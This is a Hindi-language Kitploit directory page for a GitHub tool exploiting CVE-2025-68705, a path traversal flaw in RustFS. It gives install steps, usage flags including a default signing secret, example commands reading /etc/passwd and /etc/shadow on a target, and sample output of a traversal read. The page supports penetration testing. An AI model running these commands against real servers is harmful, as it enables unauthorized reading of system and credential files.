Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68705 — CVE-2025-68705 RustFS Path Traversal Vulnerability Check | Kitploit
उपकरण/GitHubGitHub/imjdl/cve-2025-68705
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 RustFS Path Traversal Vulnerability Check

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68705 - RustFS पथ पारगमन शोषण

विवरण

यह स्क्रिप्ट RustFS में एक पथ पारगमन भेद्यता (CVE-2025-68705) का शोषण करती है जो सर्वर पर मनमानी फ़ाइलों को पढ़ने की अनुमति देती है।

आवश्यकताएँ

  • Python 3.6+
  • निर्भरताओं के लिए requirements.txt देखें

स्थापना

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

उपयोग

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

अनिवार्य तर्क

तर्कविवरण
-H, --hostलक्ष्य होस्ट IP या होस्टनाम
-p, --portलक्ष्य पोर्ट संख्या
-f, --fileपढ़ने के लिए फ़ाइल पथ (--check-only के साथ वैकल्पिक)

वैकल्पिक तर्क

उदाहरण

/etc/passwd फ़ाइल पढ़ें

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

कस्टम ऑफ़सेट और लंबाई के साथ /etc/shadow पढ़ें

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

कस्टम गुप्त कुंजी का उपयोग करें

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

केवल यह जाँचें कि लक्ष्य असुरक्षित है या नहीं

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

फ़ाइल की विशिष्ट श्रेणी पढ़ें

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

आउटपुट उदाहरण

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

संदर्भ

  • RustFS सुरक्षा परामर्श
  • CVE-2025-68705
टूल डाउनलोड करें
तर्कविवरणडिफ़ॉल्ट
-s, --secretहस्ताक्षर के लिए गुप्त कुंजीrustfsadmin
-o, --offsetफ़ाइल पढ़ने का ऑफ़सेट0
-l, --lengthपढ़ने के लिए बाइट्स की संख्या4096
--check-onlyकेवल यह जाँचें कि लक्ष्य असुरक्षित है या नहीं-